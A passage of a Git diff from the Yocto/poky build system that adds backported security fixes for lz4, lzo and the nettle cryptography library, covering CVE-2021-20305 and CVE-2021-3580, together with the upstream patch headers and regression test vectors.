ip + srcSize; diff --git a/poky/meta/recipes-support/lz4/lz4_1.9.2.bb b/poky/meta/recipes-support/lz4/lz4_1.9.2.bb index 20719fcc58..0c4a0ac807 100644 --- a/poky/meta/recipes-support/lz4/lz4_1.9.2.bb +++ b/poky/meta/recipes-support/lz4/lz4_1.9.2.bb @@ -12,8 +12,9 @@ PE = "1" SRCREV = "fdf2ef5809ca875c454510610764d9125ef2ebbd" -SRC_URI = "git://github.com/lz4/lz4.git;branch=dev \ +SRC_URI = "git://github.com/lz4/lz4.git;branch=dev;protocol=https \ file://run-ptest \ + file://CVE-2021-3520.patch \ " UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>.*)" diff --git a/poky/meta/recipes-support/lzo/lzo_2.10.bb b/poky/meta/recipes-support/lzo/lzo_2.10.bb index 85b14b3c5c..f0c8631aea 100644 --- a/poky/meta/recipes-support/lzo/lzo_2.10.bb +++ b/poky/meta/recipes-support/lzo/lzo_2.10.bb @@ -18,6 +18,8 @@ SRC_URI[sha256sum] = "c0f892943208266f9b6543b3ae308fab6284c5c90e627931446fb49b42 inherit autotools ptest +CVE_PRODUCT = "lzo oberhumer:lzo2" + EXTRA_OECONF = "--enable-shared" do_install_ptest() { diff --git a/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-1.patch b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-1.patch new file mode 100644 index 0000000000..cfc0f382fa --- /dev/null +++ b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-1.patch @@ -0,0 +1,215 @@ +Backport of: + +From a63893791280d441c713293491da97c79c0950fe Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se> +Date: Thu, 11 Mar 2021 19:37:41 +0100 +Subject: [PATCH] New functions ecc_mod_mul_canonical and + ecc_mod_sqr_canonical. + +* ecc-mod-arith.c (ecc_mod_mul_canonical, ecc_mod_sqr_canonical): +New functions. +* ecc-internal.h: Declare and document new functions. +* curve448-eh-to-x.c (curve448_eh_to_x): Use ecc_mod_sqr_canonical. +* curve25519-eh-to-x.c (curve25519_eh_to_x): Use ecc_mod_mul_canonical. +* ecc-eh-to-a.c (ecc_eh_to_a): Likewise. +* ecc-j-to-a.c (ecc_j_to_a): Likewise. +* ecc-mul-m.c (ecc_mul_m): Likewise. + +(cherry picked from commit 2bf497ba4d6acc6f352bca015837fad33008565c) + +Upstream-Status: Backport +https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-1.patch +CVE: CVE-2021-20305 dep1 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + ChangeLog | 11 +++++++++++ + curve25519-eh-to-x.c | 6 +----- + curve448-eh-to-x.c | 5 +---- + ecc-eh-to-a.c | 12 ++---------- + ecc-internal.h | 15 +++++++++++++++ + ecc-j-to-a.c | 15 +++------------ + ecc-mod-arith.c | 24 ++++++++++++++++++++++++ + ecc-mul-m.c | 6 ++---- + 8 files changed, 59 insertions(+), 35 deletions(-) + +#diff --git a/ChangeLog b/ChangeLog +#index fd138d82..5cc5c188 100644 +#--- a/ChangeLog +#+++ b/ChangeLog +#@@ -1,3 +1,14 @@ +#+2021-03-11 Niels Möller <nisse@lysator.liu.se> +#+ +#+ * ecc-mod-arith.c (ecc_mod_mul_canonical, ecc_mod_sqr_canonical): +#+ New functions. +#+ * ecc-internal.h: Declare and document new functions. +#+ * curve448-eh-to-x.c (curve448_eh_to_x): Use ecc_mod_sqr_canonical. +#+ * curve25519-eh-to-x.c (curve25519_eh_to_x): Use ecc_mod_mul_canonical. +#+ * ecc-eh-to-a.c (ecc_eh_to_a): Likewise. +#+ * ecc-j-to-a.c (ecc_j_to_a): Likewise. +#+ * ecc-mul-m.c (ecc_mul_m): Likewise. +#+ +# 2021-02-17 Niels Möller <nisse@lysator.liu.se> +# +# * Released Nettle-3.7.1. +Index: nettle-3.5.1/curve25519-eh-to-x.c +=================================================================== +--- nettle-3.5.1.orig/curve25519-eh-to-x.c ++++ nettle-3.5.1/curve25519-eh-to-x.c +@@ -53,7 +53,6 @@ curve25519_eh_to_x (mp_limb_t *xp, const + #define t2 (scratch + 2*ecc->p.size) + + const struct ecc_curve *ecc = &_nettle_curve25519; +- mp_limb_t cy; + + /* If u = U/W and v = V/W are the coordiantes of the point on the + Edwards curve we get the curve25519 x coordinate as +@@ -69,10 +68,7 @@ curve25519_eh_to_x (mp_limb_t *xp, const + ecc->p.invert (&ecc->p, t1, t0, t2 + ecc->p.size); + + ecc_modp_add (ecc, t0, wp, vp); +- ecc_modp_mul (ecc, t2, t0, t1); +- +- cy = mpn_sub_n (xp, t2, ecc->p.m, ecc->p.size); +- cnd_copy (cy, xp, t2, ecc->p.size); ++ ecc_mod_mul_canonical (&ecc->p, xp, t0, t1, t2); + #undef vp + #undef wp + #undef t0 +Index: nettle-3.5.1/ecc-eh-to-a.c +=================================================================== +--- nettle-3.5.1.orig/ecc-eh-to-a.c ++++ nettle-3.5.1/ecc-eh-to-a.c +@@ -59,9 +59,7 @@ ecc_eh_to_a (const struct ecc_curve *ecc + /* Needs 2*size + scratch for the invert call. */ + ecc->p.invert (&ecc->p, izp, zp, tp + ecc->p.size); + +- ecc_modp_mul (ecc, tp, xp, izp); +- cy = mpn_sub_n (r, tp, ecc->p.m, ecc->p.size); +- cnd_copy (cy, r, tp, ecc->p.size); ++ ecc_mod_mul_canonical (&ecc->p, r, xp, izp, tp); + + if (op) + { +@@ -81,7 +79,5 @@ ecc_eh_to_a (const struct ecc_curve *ecc + } + return; + } +- ecc_modp_mul (ecc, tp, yp, izp); +- cy = mpn_sub_n (r + ecc->p.size, tp, ecc->p.m, ecc->p.size); +- cnd_copy (cy, r + ecc->p.size, tp, ecc->p.size); ++ ecc_mod_mul_canonical (&ecc->p, r + ecc->p.size, yp, izp, tp); + } +Index: nettle-3.5.1/ecc-internal.h +=================================================================== +--- nettle-3.5.1.orig/ecc-internal.h ++++ nettle-3.5.1/ecc-internal.h +@@ -49,6 +49,8 @@ + #define ecc_mod_submul_1 _nettle_ecc_mod_submul_1 + #define ecc_mod_mul _nettle_ecc_mod_mul + #define ecc_mod_sqr _nettle_ecc_mod_sqr ++#define ecc_mod_mul_canonical _nettle_ecc_mod_mul_canonical ++#define ecc_mod_sqr_canonical _nettle_ecc_mod_sqr_canonical + #define ecc_mod_random _nettle_ecc_mod_random + #define ecc_mod _nettle_ecc_mod + #define ecc_mod_inv _nettle_ecc_mod_inv +@@ -263,6 +265,19 @@ ecc_mod_sqr (const struct ecc_modulo *m, + #define ecc_modq_mul(ecc, r, a, b) \ + ecc_mod_mul (&(ecc)->q, (r), (a), (b)) + ++/* These mul and sqr functions produce a canonical result, 0 <= R < M. ++ Requirements on input and output areas are similar to the above ++ functions, except that it is *not* allowed to pass rp = rp + ++ m->size. ++ */ ++void ++ecc_mod_mul_canonical (const struct ecc_modulo *m, mp_limb_t *rp, ++ const mp_limb_t *ap, const mp_limb_t *bp, mp_limb_t *tp); ++ ++void ++ecc_mod_sqr_canonical (const struct ecc_modulo *m, mp_limb_t *rp, ++ const mp_limb_t *ap, mp_limb_t *tp); ++ + /* mod q operations. */ + void + ecc_mod_random (const struct ecc_modulo *m, mp_limb_t *xp, +Index: nettle-3.5.1/ecc-j-to-a.c +=================================================================== +--- nettle-3.5.1.orig/ecc-j-to-a.c ++++ nettle-3.5.1/ecc-j-to-a.c +@@ -51,8 +51,6 @@ ecc_j_to_a (const struct ecc_curve *ecc, + #define izBp (scratch + 3*ecc->p.size) + #define tp scratch + +- mp_limb_t cy; +- + if (ecc->use_redc) + { + /* Set v = (r_z / B^2)^-1, +@@ -86,17 +84,14 @@ ecc_j_to_a (const struct ecc_curve *ecc, + ecc_modp_sqr (ecc, iz2p, izp); + } + +- ecc_modp_mul (ecc, iz3p, iz2p, p); +- /* ecc_modp (and ecc_modp_mul) may return a value up to 2p - 1, so +- do a conditional subtraction. */ +- cy = mpn_sub_n (r, iz3p, ecc->p.m, ecc->p.size); +- cnd_copy (cy, r, iz3p, ecc->p.size); ++ ecc_mod_mul_canonical (&ecc->p, r, iz2p, p, iz3p); + + if (op) + { + /* Skip y coordinate */ + if (op > 1) + { ++ mp_limb_t cy; + /* Also reduce the x coordinate mod ecc->q. It should + already be < 2*ecc->q, so one subtraction should + suffice. */ +@@ -106,10 +101,7 @@ ecc_j_to_a (const struct ecc_curve *ecc, + return; + } + ecc_modp_mul (ecc, iz3p, iz2p, izp); +- ecc_modp_mul (ecc, tp, iz3p, p + ecc->p.size); +- /* And a similar subtraction. */ +- cy = mpn_sub_n (r + ecc->p.size, tp, ecc->p.m, ecc->p.size); +- cnd_copy (cy, r + ecc->p.size, tp, ecc->p.size); ++ ecc_mod_mul_canonical (&ecc->p, r + ecc->p.size, iz3p, p + ecc->p.size, iz3p); + + #undef izp + #undef up +Index: nettle-3.5.1/ecc-mod-arith.c +=================================================================== +--- nettle-3.5.1.orig/ecc-mod-arith.c ++++ nettle-3.5.1/ecc-mod-arith.c +@@ -119,6 +119,30 @@ ecc_mod_mul (const struct ecc_modulo *m, + } + + void ++ecc_mod_mul_canonical (const struct ecc_modulo *m, mp_limb_t *rp, ++ const mp_limb_t *ap, const mp_limb_t *bp, mp_limb_t *tp) ++{ ++ mp_limb_t cy; ++ mpn_mul_n (tp + m->size, ap, bp, m->size); ++ m->reduce (m, tp + m->size); ++ ++ cy = mpn_sub_n (rp, tp + m->size, m->m, m->size); ++ cnd_copy (cy, rp, tp + m->size, m->size); ++} ++ ++void ++ecc_mod_sqr_canonical (const struct ecc_modulo *m, mp_limb_t *rp, ++ const mp_limb_t *ap, mp_limb_t *tp) ++{ ++ mp_limb_t cy; ++ mpn_sqr (tp + m->size, ap, m->size); ++ m->reduce (m, tp + m->size); ++ ++ cy = mpn_sub_n (rp, tp + m->size, m->m, m->size); ++ cnd_copy (cy, rp, tp + m->size, m->size); ++} ++ ++void + ecc_mod_sqr (const struct ecc_modulo *m, mp_limb_t *rp, + const mp_limb_t *ap) + { diff --git a/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-2.patch b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-2.patch new file mode 100644 index 0000000000..bb56b14c8c --- /dev/null +++ b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-2.patch @@ -0,0 +1,53 @@ +Backport of: + +From 971bed6ab4b27014eb23085e8176917e1a096fd5 Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se> +Date: Sat, 13 Mar 2021 17:26:37 +0100 +Subject: [PATCH] Use ecc_mod_mul_canonical for point comparison. + +* eddsa-verify.c (equal_h): Use ecc_mod_mul_canonical. + +(cherry picked from commit 5b7608fde3a6d2ab82bffb35db1e4e330927c906) + +Upstream-Status: Backport +https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-2.patch +CVE: CVE-2021-20305 dep2 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + ChangeLog | 4 ++++ + eddsa-verify.c | 9 ++------- + 2 files changed, 6 insertions(+), 7 deletions(-) + +#diff --git a/ChangeLog b/ChangeLog +#index 5cc5c188..2a9217a6 100644 +#--- a/ChangeLog +#+++ b/ChangeLog +#@@ -1,3 +1,7 @@ +#+2021-03-13 Niels Möller <nisse@lysator.liu.se> +#+ +#+ * eddsa-verify.c (equal_h): Use ecc_mod_mul_canonical. +#+ +# 2021-03-11 Niels Möller <nisse@lysator.liu.se> +# +# * ecc-mod-arith.c (ecc_mod_mul_canonical, ecc_mod_sqr_canonical): +Index: nettle-3.5.1/eddsa-verify.c +=================================================================== +--- nettle-3.5.1.orig/eddsa-verify.c ++++ nettle-3.5.1/eddsa-verify.c +@@ -53,13 +53,8 @@ equal_h (const struct ecc_modulo *p, + #define t0 scratch + #define t1 (scratch + p->size) + +- ecc_mod_mul (p, t0, x1, z2); +- if (mpn_cmp (t0, p->m, p->size) >= 0) +- mpn_sub_n (t0, t0, p->m, p->size); +- +- ecc_mod_mul (p, t1, x2, z1); +- if (mpn_cmp (t1, p->m, p->size) >= 0) +- mpn_sub_n (t1, t1, p->m, p->size); ++ ecc_mod_mul_canonical (p, t0, x1, z2, t0); ++ ecc_mod_mul_canonical (p, t1, x2, z1, t1); + + return mpn_cmp (t0, t1, p->size) == 0; + diff --git a/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-3.patch b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-3.patch new file mode 100644 index 0000000000..15a892ecdf --- /dev/null +++ b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-3.patch @@ -0,0 +1,122 @@ +Backport of: + +From 74ee0e82b6891e090f20723750faeb19064e31b2 Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se> +Date: Sat, 13 Mar 2021 15:19:19 +0100 +Subject: [PATCH] Fix bug in ecc_ecdsa_verify. + +* ecc-ecdsa-verify.c (ecc_ecdsa_verify): Use ecc_mod_mul_canonical +to compute the scalars used for ecc multiplication. +* testsuite/ecdsa-verify-test.c (test_main): Add test case that +triggers an assert on 64-bit platforms, without above fix. +* testsuite/ecdsa-sign-test.c (test_main): Test case generating +the same signature. + +(cherry picked from commit 2397757b3f95fcae1e2d3011bf99ca5b5438378f) + +Upstream-Status: Backport +https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-3.patch +CVE: CVE-2021-20305 dep3 +[Minor fixup on _nettle_secp_224r1] +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + ChangeLog | 10 +++++++++- + ecc-ecdsa-verify.c | 4 ++-- + testsuite/ecdsa-sign-test.c | 13 +++++++++++++ + testsuite/ecdsa-verify-test.c | 20 ++++++++++++++++++++ + 4 files changed, 44 insertions(+), 3 deletions(-) + +#diff --git a/ChangeLog b/ChangeLog +#index 2a9217a6..63848f53 100644 +#--- a/ChangeLog +#+++ b/ChangeLog +#@@ -1,7 +1,15 @@ +# 2021-03-13 Niels Möller <nisse@lysator.liu.se> +# +#- * eddsa-verify.c (equal_h): Use ecc_mod_mul_canonical. +#+ * ecc-ecdsa-verify.c (ecc_ecdsa_verify): Use ecc_mod_mul_canonical +#+ to compute the scalars used for ecc multiplication. +#+ * testsuite/ecdsa-verify-test.c (test_main): Add test case that +#+ triggers an assert on 64-bit platforms, without above fix. +#+ * testsuite/ecdsa-sign-test.c (test_main): Test case generating +#+ the same signature. +#+ +#+2021-03-13 Niels Möller <nisse@lysator.liu.se> +# +#+ * eddsa-verify.c (equal_h): Use ecc_mod_mul_canonical. +# 2021-03-11 Niels Möller <nisse@lysator.liu.se> +# +# * ecc-mod-arith.c (ecc_mod_mul_canonical, ecc_mod_sqr_canonical): +Index: nettle-3.5.1/ecc-ecdsa-verify.c +=================================================================== +--- nettle-3.5.1.orig/ecc-ecdsa-verify.c ++++ nettle-3.5.1/ecc-ecdsa-verify.c +@@ -112,10 +112,10 @@ ecc_ecdsa_verify (const struct ecc_curve + + /* u1 = h / s, P1 = u1 * G */ + ecc_hash (&ecc->q, hp, length, digest); +- ecc_modq_mul (ecc, u1, hp, sinv); ++ ecc_mod_mul_canonical (&ecc->q, u1, hp, sinv, u1); + + /* u2 = r / s, P2 = u2 * Y */ +- ecc_modq_mul (ecc, u2, rp, sinv); ++ ecc_mod_mul_canonical (&ecc->q, u2, rp, sinv, u2); + + /* Total storage: 5*ecc->p.size + ecc->mul_itch */ + ecc->mul (ecc, P2, u2, pp, u2 + ecc->p.size); +Index: nettle-3.5.1/testsuite/ecdsa-sign-test.c +=================================================================== +--- nettle-3.5.1.orig/testsuite/ecdsa-sign-test.c ++++ nettle-3.5.1/testsuite/ecdsa-sign-test.c +@@ -58,6 +58,19 @@ test_ecdsa (const struct ecc_curve *ecc, + void + test_main (void) + { ++ /* Producing the signature for corresponding test in ++ ecdsa-verify-test.c, with special u1 and u2. */ ++ test_ecdsa (&_nettle_secp_224r1, ++ "99b5b787484def12894ca507058b3bf5" ++ "43d72d82fa7721d2e805e5e6", ++ "2", ++ SHEX("cdb887ac805a3b42e22d224c85482053" ++ "16c755d4a736bb2032c92553"), ++ "706a46dc76dcb76798e60e6d89474788" ++ "d16dc18032d268fd1a704fa6", /* r */ ++ "3a41e1423b1853e8aa89747b1f987364" ++ "44705d6d6d8371ea1f578f2e"); /* s */ ++ + /* Test cases for the smaller groups, verified with a + proof-of-concept implementation done for Yubico AB. */ + test_ecdsa (&_nettle_secp_192r1, +Index: nettle-3.5.1/testsuite/ecdsa-verify-test.c +=================================================================== +--- nettle-3.5.1.orig/testsuite/ecdsa-verify-test.c ++++ nettle-3.5.1/testsuite/ecdsa-verify-test.c +@@ -81,6 +81,26 @@ test_ecdsa (const struct ecc_curve *ecc, + void + test_main (void) + { ++ /* Corresponds to nonce k = 2 and private key z = ++ 0x99b5b787484def12894ca507058b3bf543d72d82fa7721d2e805e5e6. z and ++ hash are chosen so that intermediate scalars in the verify ++ equations are u1 = 0x6b245680e700, u2 = ++ 259da6542d4ba7d21ad916c3bd57f811. These values require canonical ++ reduction of the scalars. Bug caused by missing canonical ++ reduction reported by Guido Vranken. */ ++ test_ecdsa (&_nettle_secp_224r1, ++ "9e7e6cc6b1bdfa8ee039b66ad85e5490" ++ "7be706a900a3cba1c8fdd014", /* x */ ++ "74855db3f7c1b4097ae095745fc915e3" ++ "8a79d2a1de28f282eafb22ba", /* y */ ++ ++ SHEX("cdb887ac805a3b42e22d224c85482053" ++ "16c755d4a736bb2032c92553"), ++ "706a46dc76dcb76798e60e6d89474788" ++ "d16dc18032d268fd1a704fa6", /* r */ ++ "3a41e1423b1853e8aa89747b1f987364" ++ "44705d6d6d8371ea1f578f2e"); /* s */ ++ + /* From RFC 4754 */ + test_ecdsa (&_nettle_secp_256r1, + "2442A5CC 0ECD015F A3CA31DC 8E2BBC70" diff --git a/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-4.patch b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-4.patch new file mode 100644 index 0000000000..54b4fa584c --- /dev/null +++ b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-4.patch @@ -0,0 +1,48 @@ +Backport of: + +From 51f643eee00e2caa65c8a2f5857f49acdf3ef1ce Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se> +Date: Sat, 13 Mar 2021 16:27:50 +0100 +Subject: [PATCH] Ensure ecdsa_sign output is canonically reduced. + +* ecc-ecdsa-sign.c (ecc_ecdsa_sign): Ensure s output is reduced to +canonical range. + +(cherry picked from commit c24b36160dc5303f7541dd9da1429c4046f27398) + +Upstream-Status: Backport +https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-4.patch +CVE: CVE-2021-20305 dep4 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + ChangeLog | 3 +++ + ecc-ecdsa-sign.c | 3 +-- + 2 files changed, 4 insertions(+), 2 deletions(-) + +#diff --git a/ChangeLog b/ChangeLog +#index 63848f53..fb2d7f66 100644 +#--- a/ChangeLog +#+++ b/ChangeLog +#@@ -1,5 +1,8 @@ +# 2021-03-13 Niels Möller <nisse@lysator.liu.se> +# +#+ * ecc-ecdsa-sign.c (ecc_ecdsa_sign): Ensure s output is reduced to +#+ canonical range. +#+ +# * ecc-ecdsa-verify.c (ecc_ecdsa_verify): Use ecc_mod_mul_canonical +# to compute the scalars used for ecc multiplication. +# * testsuite/ecdsa-verify-test.c (test_main): Add test case that +--- a/ecc-ecdsa-sign.c ++++ b/ecc-ecdsa-sign.c +@@ -90,9 +90,8 @@ ecc_ecdsa_sign (const struct ecc_curve * + + ecc_modq_mul (ecc, tp, zp, rp); + ecc_modq_add (ecc, hp, hp, tp); +- ecc_modq_mul (ecc, tp, hp, kinv); ++ ecc_mod_mul_canonical (&ecc->q, sp, hp, kinv, tp); + +- mpn_copyi (sp, tp, ecc->p.size); + #undef P + #undef hp + #undef kinv diff --git a/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-5.patch b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-5.patch new file mode 100644 index 0000000000..468ff66266 --- /dev/null +++ b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-5.patch @@ -0,0 +1,53 @@ +Backport of: + +From ae3801a0e5cce276c270973214385c86048d5f7b Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se> +Date: Sat, 13 Mar 2021 16:42:21 +0100 +Subject: [PATCH] Similar fix for eddsa. + +* eddsa-hash.c (_eddsa_hash): Ensure result is canonically +reduced. Two of the three call sites need that. + +(cherry picked from commit d9b564e4b3b3a5691afb9328c7342b3f7ca64288) + + +Upstream-Status: Backport +https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-6.patch +CVE: CVE-2021-20305 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + ChangeLog | 3 +++ + eddsa-hash.c | 10 +++++++--- + 2 files changed, 10 insertions(+), 3 deletions(-) + +#diff --git a/ChangeLog b/ChangeLog +#index 5f8a22c2..ce330831 100644 +#--- a/ChangeLog +#+++ b/ChangeLog +#@@ -1,5 +1,8 @@ +# 2021-03-13 Niels Möller <nisse@lysator.liu.se> +# +#+ * eddsa-hash.c (_eddsa_hash): Ensure result is canonically +#+ reduced. Two of the three call sites need that. +#+ +# * ecc-gostdsa-verify.c (ecc_gostdsa_verify): Use ecc_mod_mul_canonical +# to compute the scalars used for ecc multiplication. +# +Index: nettle-3.5.1/eddsa-hash.c +=================================================================== +--- nettle-3.5.1.orig/eddsa-hash.c ++++ nettle-3.5.1/eddsa-hash.c +@@ -46,7 +46,12 @@ void + _eddsa_hash (const struct ecc_modulo *m, + mp_limb_t *rp, const uint8_t *digest) + { ++ mp_limb_t cy; + size_t nbytes = 1 + m->bit_size / 8; + mpn_set_base256_le (rp, 2*m->size, digest, 2*nbytes); + m->mod (m, rp); ++ mpn_copyi (rp + m->size, rp, m->size); ++ /* Ensure canonical reduction. */ ++ cy = mpn_sub_n (rp, rp + m->size, m->m, m->size); ++ cnd_copy (cy, rp, rp + m->size, m->size); + } diff --git a/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_1.patch b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_1.patch new file mode 100644 index 0000000000..ac3a638e72 --- /dev/null +++ b/poky/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_1.patch @@ -0,0 +1,277 @@ +From cd6059aebdd3059fbcf674dddb850b821c13b6c2 Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se> +Date: Tue, 8 Jun 2021 21:31:39 +0200 +Subject: [PATCH 1/2] Change _rsa_sec_compute_root_tr to take a fix input size. + +Improves consistency with _rsa_sec_compute_root, and fixes zero-input bug. + +(cherry picked from commit 485b5e2820a057e873b1ba812fdb39cae4adf98c) + +Upstream-Status: Backport +CVE: CVE-2021-3580 dep#1 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + ChangeLog | 17 +++++++++- + rsa-decrypt-tr.c | 7 ++--- + rsa-internal.h | 4 +-- + rsa-sec-decrypt.c | 9 ++++-- + rsa-sign-tr.c | 61 +++++++++++++++++------------------- + testsuite/rsa-encrypt-test.c | 14 ++++++++- + 6 files changed, 69 insertions(+), 43 deletions(-) + +Index: nettle-3.5.1/rsa-decrypt-tr.c +=================================================================== +--- nettle-3.5.1.orig/rsa-decrypt-tr.c ++++ nettle-3.5.1/rsa-decrypt-tr.c +@@ -52,14 +52,13 @@ rsa_decrypt_tr(const struct rsa_public_k + mp_size_t key_limb_size; + int res; + +- key_limb_size = NETTLE_OCTET_SIZE_TO_LIMB_SIZE(key->size); ++ key_limb_size = mpz_size(pub->n); + + TMP_GMP_ALLOC (m, key_limb_size); + TMP_GMP_ALLOC (em, key->size); ++ mpz_limbs_copy(m, gibberish, key_limb_size); + +- res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, m, +- mpz_limbs_read(gibberish), +- mpz_size(gibberish)); ++ res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, m, m); + + mpn_get_base256 (em, key->size, m, key_limb_size); + +Index: nettle-3.5.1/rsa-internal.h +=================================================================== +--- nettle-3.5.1.orig/rsa-internal.h ++++ nettle-3.5.1/rsa-internal.h +@@ -78,11 +78,11 @@ _rsa_sec_compute_root(const struct rsa_p + mp_limb_t *scratch); + + /* Safe side-channel silent variant, using RSA blinding, and checking the +- * result after CRT. */ ++ * result after CRT. In-place calls, with x == m, is allowed. */ + int + _rsa_sec_compute_root_tr(const struct rsa_public_key *pub, + const struct rsa_private_key *key, + void *random_ctx, nettle_random_func *random, +- mp_limb_t *x, const mp_limb_t *m, size_t mn); ++ mp_limb_t *x, const mp_limb_t *m); + + #endif /* NETTLE_RSA_INTERNAL_H_INCLUDED */ +Index: nettle-3.5.1/rsa-sec-decrypt.c +=================================================================== +--- nettle-3.5.1.orig/rsa-sec-decrypt.c ++++ nettle-3.5.1/rsa-sec-decrypt.c +@@ -58,9 +58,12 @@ rsa_sec_decrypt(const struct rsa_public_ + TMP_GMP_ALLOC (m, mpz_size(pub->n)); + TMP_GMP_ALLOC (em, key->size); + +- res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, m, +- mpz_limbs_read(gibberish), +- mpz_size(gibberish)); ++ /* We need a copy because m can be shorter than key_size, ++ * but _rsa_sec_compute_root_tr expect all inputs to be ++ * normalized to a key_size long buffer length */ ++ mpz_limbs_copy(m, gibberish, mpz_size(pub->n)); ++ ++ res = _rsa_sec_compute_root_tr (pub, key, random_ctx, random, m, m); + + mpn_get_base256 (em, key->size, m, mpz_size(pub->n)); + +Index: nettle-3.5.1/rsa-sign-tr.c +=================================================================== +--- nettle-3.5.1.orig/rsa-sign-tr.c ++++ nettle-3.5.1/rsa-sign-tr.c +@@ -131,35 +131,34 @@ int + _rsa_sec_compute_root_tr(const struct rsa_public_key *pub, + const struct rsa_private_key *key, + void *random_ctx, nettle_random_func *random, +- mp_limb_t *x, const mp_limb_t *m, size_t mn) ++ mp_limb_t *x, const mp_limb_t *m) + { ++ mp_size_t nn; + mpz_t mz; + mpz_t xz; + int res; + +- mpz_init(mz); + mpz_init(xz); + +- mpn_copyi(mpz_limbs_write(mz, mn), m, mn); +- mpz_limbs_finish(mz, mn); ++ nn = mpz_size (pub->n); + +- res = rsa_compute_root_tr(pub, key, random_ctx, random, xz, mz); ++ res = rsa_compute_root_tr(pub, key, random_ctx, random, xz, ++ mpz_roinit_n(mz, m, nn)); + + if (res) +- mpz_limbs_copy(x, xz, mpz_size(pub->n)); ++ mpz_limbs_copy(x, xz, nn); + +- mpz_clear(mz); + mpz_clear(xz); + return res; + } + #else + /* Blinds m, by computing c = m r^e (mod n), for a random r. Also +- returns the inverse (ri), for use by rsa_unblind. */ ++ returns the inverse (ri), for use by rsa_unblind. Must have c != m, ++ no in-place operation.*/ + static void + rsa_sec_blind (const struct rsa_public_key *pub, + void *random_ctx, nettle_random_func *random, +- mp_limb_t *c, mp_limb_t *ri, const mp_limb_t *m, +- mp_size_t mn) ++ mp_limb_t *c, mp_limb_t *ri, const mp_limb_t *m) + { + const mp_limb_t *ep = mpz_limbs_read (pub->e); + const mp_limb_t *np = mpz_limbs_read (pub->n); +@@ -177,15 +176,15 @@ rsa_sec_blind (const struct rsa_public_k + + /* c = m*(r^e) mod n */ + itch = mpn_sec_powm_itch(nn, ebn, nn); +- i2 = mpn_sec_mul_itch(nn, mn); ++ i2 = mpn_sec_mul_itch(nn, nn); + itch = MAX(itch, i2); +- i2 = mpn_sec_div_r_itch(nn + mn, nn); ++ i2 = mpn_sec_div_r_itch(2*nn, nn); + itch = MAX(itch, i2); + i2 = mpn_sec_invert_itch(nn); + itch = MAX(itch, i2); + +- TMP_GMP_ALLOC (tp, nn + mn + itch); +- scratch = tp + nn + mn; ++ TMP_GMP_ALLOC (tp, 2*nn + itch); ++ scratch = tp + 2*nn; + + /* ri = r^(-1) */ + do +@@ -198,9 +197,8 @@ rsa_sec_blind (const struct rsa_public_k + while (!mpn_sec_invert (ri, tp, np, nn, 2 * nn * GMP_NUMB_BITS, scratch)); + + mpn_sec_powm (c, rp, nn, ep, ebn, np, nn, scratch); +- /* normally mn == nn, but m can be smaller in some cases */ +- mpn_sec_mul (tp, c, nn, m, mn, scratch); +- mpn_sec_div_r (tp, nn + mn, np, nn, scratch); ++ mpn_sec_mul (tp, c, nn, m, nn, scratch); ++ mpn_sec_div_r (tp, 2*nn, np, nn, scratch); + mpn_copyi(c, tp, nn); + + TMP_GMP_FREE (r); +@@ -208,7 +206,7 @@ rsa_sec_blind (const struct rsa_public_k + TMP_GMP_FREE (tp); + } + +-/* m = c ri mod n */ ++/* m = c ri mod n. Allows x == c. */ + static void + rsa_sec_unblind (const struct rsa_public_key *pub, + mp_limb_t *x, mp_limb_t *ri, const mp_limb_t *c) +@@ -299,7 +297,7 @@ int + _rsa_sec_compute_root_tr(const struct rsa_public_key *pub, + const struct rsa_private_key *key, + void *random_ctx, nettle_random_func *random, +- mp_limb_t *x, const mp_limb_t *m, size_t mn) ++ mp_limb_t *x, const mp_limb_t *m) 